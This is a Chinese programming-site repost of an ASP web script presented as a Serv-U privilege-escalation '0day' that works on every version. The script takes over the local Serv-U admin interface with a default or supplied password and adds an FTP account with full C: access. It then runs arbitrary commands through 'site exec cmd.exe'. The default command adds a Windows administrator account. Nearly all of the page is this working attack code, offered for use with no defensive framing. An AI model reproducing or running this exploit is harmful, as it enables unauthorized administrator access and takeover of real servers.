欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

serv-u最新通杀所有版本0day asp代码

程序员文章站 2022-05-01 10:54:13
serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的,不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权... 12-01-29...
要不容易出错的。

复制代码
代码如下:

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
function httpopen(neirong,fangshi,dizhi,refer,cookie)
set http=server.createobject("microsoft.xmlhttp")
http.open fangshi,dizhi,false
http.setrequestheader "referer",refer
http.setrequestheader "content-type","application/x-www-form-urlencoded"
http.setrequestheader "content-length",len(neirong)
http.setrequestheader "user-agent","serv-u"
http.setrequestheader "x-user-agent","mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; sv1; .net clr 1.1.4322)"
if cookie<>"" then
http.setrequestheader "cookie",cookie
end if
http.send neirong
httpopen=bytes2bstr(http.responsebody)
set http=nothing
end function
function getmidstr(l,r,str)
int_left=instr(str,l)
int_right=instr(str,r)
if int_left>0 and int_right>0 then
getmidstr=mid(str,int_left+len(l),int_right-int_left-len(l))
else
getmidstr="执行的字符串中不包含“"&l&"”或“"&r&"”"
end if
end function
function bytes2bstr(vin)
strreturn = ""
for i = 1 to lenb(vin)
thischarcode = ascb(midb(vin,i,1))
if thischarcode < &h80 then
strreturn = strreturn & chr(thischarcode)
else
nextcharcode = ascb(midb(vin,i+1,1))
strreturn = strreturn & chr (clng(thischarcode) * &h100 + cint(nextcharcode))
i = i + 1
end if
next
bytes2bstr = strreturn
end function
%>
<%
'----------自定义参数开始-----------
action=request("action")
loginpass=request.form("loginpass")
port=request("port")
mydomain=request.form("mydomain")
path=request.form("path")
ftpport = request.form("ftpport")
user=request.form("user")
pass=request.form("pass")
cmd= request.form("cmd")
sessionid=request("sessionid")
organizationid=request("organizationid")
userid=request("userid")
domainid=request("domainid")
'----------自定义参数结束-----------
select case action
case 1
returns=httpopen("user=&pword="&loginpass&"&language=zh%2ccn%26","post","http://127.0.0.1:"&port&"/web%20client/login.xml?command=login&sync=1227081437828","http://127.0.0.1:"&port&"/?session=39893&language=zh,cn&localadmin=1","")
sessionid=getmidstr("<sessionid>","</sessionid>",returns)
if sessionid<>"" then
response.write "login ok!"&"</br>"
response.redirect "?action=2&sessionid="&sessionid&"&port="&port
else
response.write "error!"&"</br>"
end if
case 2
call main2()
case 3
returns=httpopen("","post","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1","",sessionid)
organizationidtemp=mid(returns,instr(returns,"organizationusers.xml&id="),len("organizationusers.xml&id=")+15)
organizationid=mid(organizationidtemp,instr(organizationidtemp,"=")+1,instr(organizationidtemp,"""")-instr(organizationidtemp,"=")-1)
if organizationid<>"" then
response.write "get organizationid "&organizationid&" ok!"&"</br>"
response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&organizationid="&organizationid
else
response.write "error!"&"</br>"
end if
case 4
call main3()
case 5
returns=httpopen("","post","http://127.0.0.1:"&port&"/admin/xml/user.xml?command=addobject&object=corganization."&organizationid&".user&temp=1&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
userid=getmidstr("<var name=""objectid"" val=""",""" />",returns)
if userid<>"" then
response.write "get userid "&userid&" ok!"&"</br>"
response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&organizationid="&organizationid&"&userid="&userid
else
response.write "error!"
end if
case 6
call main4()
case 7
returns=httpopen("access=7999&maxsize=0&dir=%2fc%3a&undefined=undefined&maxsizedisp=&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=addobject&object=cuser."&userid&".diraccess&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
returns=httpopen("loginid="&user&"&fullname=&password="&pass&"&combopasswordtype=%e5%b8%b8%e8%a7%84%e5%af%86%e7%a0%81&passwordtype=0&comboadmintype=%e6%97%a0%e6%9d%83%e9%99%90&admintype=&combohomedir=%2fc%3a&homedir=%2f"&path&"&combotype=%e6%b0%b8%e4%b9%85%e5%b8%90%e6%88%b7&type=0&expireson=0&combowebclientstartupmode=%e6%8f%90%e7%a4%ba%e7%94%a8%e6%88%b7%e4%bd%bf%e7%94%a8%e4%bd%95%e7%a7%8d%e5%ae%a2%e6%88%b7%e7%ab%af&webclientstartupmode=&lockinhomedir=0&enabled=1&alwaysallowlogin=1&description=&=&includerespcodesinmsgfiles=&combosignonmessagefilepath=&signonmessagefilepath=&signonmessage=&signonmessagetext=&combolimittype=%e8%bf%9e%e6%8e%a5&limittype=connection&quotabytes=0&quota=0&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=updateobject&object=corganization."&organizationid&".user."&userid&"&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
response.write "add user ok!"&"</br>"
response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid
case 8
call main5()
case 9
returns=httpopen("domainname="&mydomain&"&description=test1&enabled=1&enableftp=1&enableftps=0&enablessh=0&enablehttp=0&enablehttps=0&ftpport="&ftpport&"&ftpsport=990&sshport=22&httpport=80&httpsport=443&bindipaddress=&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=objectcommand&object=cserver.0.createdomain&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
domainid=getmidstr("<objectid>","</objectid>",returns)
response.write "create domain ok!"&"</br>"
response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid&"&domainid="&domainid
case 10
call main6()
case 11
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:"&ftpport&"/", false, "", ""
b.send "user " & user & vbcrlf & "pass "& pass & vbcrlf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbcrlf & "quit" & vbcrlf
response.write replace(b.responsetext,chr(13),"
")
response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&organizationid="&organizationid&"&domainid="&domainid
case 12
call main7()
case 13
returns=httpopen("ids="&domainid&"&","post","http://127.0.0.1:"&port&"/admin/xml/result.xml?command=deleteobject&object=cserver.0.domain&sync=1227081437828","http://127.0.0.1:"&port&"/admin/serverusers.htm?page=1",sessionid)
response.write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&"</br>"
case else
call main1()
end select
sub main1()
%>
<form id="form1" name="form1" method="post" action="?action=1">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第一步:获取sessionid</strong></td>
</tr>
<tr>
<td align="right">管理端口:</td>
<td><input name="port" type="text" id="port" value="43958" /></td>
</tr>
<tr>
<td align="right">管理员密码:</td>
<td><input name="loginpass" type="text" id="loginpass" value="1" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p>
<%
end sub
%>
<% sub main2() %>
<form id="form1" name="form1" method="post" action="?action=3&sessionid=<%=sessionid%>&port=<%=port%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第二步:获取organizationid</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>这一步有点慢,请等待.</strong></p>
<% end sub %>
<% sub main3() %>
<form id="form1" name="form1" method="post" action="?action=5&sessionid=<%=sessionid%>&port=<%=port%>&organizationid=<%=organizationid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第三步:获取userid</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main4() %>
<form id="form1" name="form1" method="post" action="?action=7&sessionid=<%=sessionid%>&port=<%=port%>&organizationid=<%=organizationid%>&userid=<%=userid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第四步:加用户</strong></td>
</tr>
<tr>
<td align="right">新ftp账号:</td>
<td><input name="user" type="text" id="user" value="ash" /></td>
</tr>
<tr>
<td align="right">新ftp密码:</td>
<td><input name="pass" type="text" id="pass" value="hahaha" /></td>
</tr>
<tr>
<td align="right">系统路径:</td>
<td><input name="path" type="text" id="path" value="c:" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main5() %>
<form id="form1" name="form1" method="post" action="?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>第五步:创建域</strong></td>
</tr>
<tr>
<td align="right">要添加的域:</td>
<td><input name="mydomain" type="text" id="mydomain" value="testhack" /></td>
</tr>
<tr>
<td align="right">域端口:</td>
<td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>
<% sub main6() %>
<form id="form1" name="form1" method="post" action="?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>&domainid=<%=domainid%>">
<table border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>执行命令</strong></td>
</tr>
<tr>
<td align="right">ftp账号:</td>
<td><input name="user" type="text" id="user" value="ash" /></td>
</tr>
<tr>
<tr>
<td align="right">ftp密码:</td>
<td><input name="pass" type="text" id="pass" value="hahaha" /></td>
</tr>
<tr>
<td align="right">ftp端口:</td>
<td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
</tr>
<tr>
<td align="right">你的语句:</td>
<td><input name="cmd" type="text" id="cmd" value="net user admin admin123456 /add&net localgroup administrators admin /add" size="80" /></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p>
<p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p>

<% end sub %>
<% sub main7() %>
<form id="form1" name="form1" method="post" action="?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&organizationid=<%=organizationid%>&domainid=<%=domainid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center"><strong>删除临时域</strong></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
</td>
</tr>
</table>
</form>
<% end sub %>

把上面代码保存成tmdsb.asp就行了。